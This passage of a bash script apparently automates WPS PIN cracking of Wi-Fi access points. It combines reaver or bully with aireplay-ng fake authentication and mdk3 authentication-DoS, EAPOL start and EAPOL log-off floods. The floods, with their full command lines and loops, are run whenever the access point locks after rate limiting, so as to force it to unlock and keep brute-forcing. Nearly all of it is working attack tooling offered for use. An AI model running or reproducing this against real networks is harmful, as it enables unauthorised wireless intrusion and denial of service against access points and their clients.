if [ ! -z "$BULLY_CHECK" ]; then
clear;
BULLY_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mbully is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
function MDK3_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx WELCOME TO MDK3 FLOOD ATTACK MAIN MENU x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and x\e[0m";
echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding x\e[0m";
echo -e "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
echo -e "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
done;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
clear
AUTH_DOS_MAIN_MENU;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
clear
EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
clear
EAPOL_LOG_OFF_ATTACK_MAIN_MENU;
fi
}
###########################################################################
function AUTH_DOS_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Authentication DoS Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients x\e[0m";
echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when x\e[0m";
echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
echo "$AUTH_DOS_FLOOD_COMMAND";
echo ;
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS
if [ "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
clear
MDK3_MAIN_MENU
fi
echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
sleep 3;
clear
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx EAPOL Start Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
echo "$EAPOL_START_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
sleep 3;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx EAPOL Log Off Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
while [[ "$TARGET_STATION" = @(|) ]]; do
echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
echo
read -p "What is the MAC address of one of the client connected?": TARGET_STATION
done
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
sleep 3;
clear;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
##########################################################################
function REAVER {
while :;do
echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null
echo "Please Wait..." > /etc/reaver_tmp.txt 2> /dev/null;
sleep 5;
done
}
###########################################################################
function BULLY {
while :; do
stdbuf -o0 -e0 $BULLY_COMMAND_LINE|tee -a /etc/bully_tmp.txt > /dev/null
echo "Please Wait..." > /etc/bully_tmp.txt 2> /dev/null
sleep 5;
done
}
###########################################################################
function MDK3_FOR_REAVER {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON1 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
###
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
##gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
###for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
###kill -9 "$i" &> /dev/null ;
###kill -9"$i" &> /dev/null ;
###killall mdk3 2> /dev/null
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
killall mdk3 2> /dev/null
fi
done
}
###########################################################################
function MDK3_FOR_BULLY {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WPS lockout reported, sleeping for 10 seconds ..." -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WPS lockout reported, sleeping for 10 seconds ..." ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
killall mdk3 2> /dev/null
fi
done
}
########################################################################################################################
function TAIL_FOR_REAVER {
while :; do
clear
timeout 10 tail -n 100 -f /etc/reaver_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function TAIL_FOR_BULLY {
while :; do
clear
timeout 10 tail -n 100 -f /etc/bully_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function AIREPLAY {
while :; do
aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2>> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
echo "Please Wait..." >> /etc/aireplay_tmp.txt 2> /dev/null
sleep 1;
done
}
###########################################################################
MDK3_MAIN_MENUSource: https://github.com/r0bag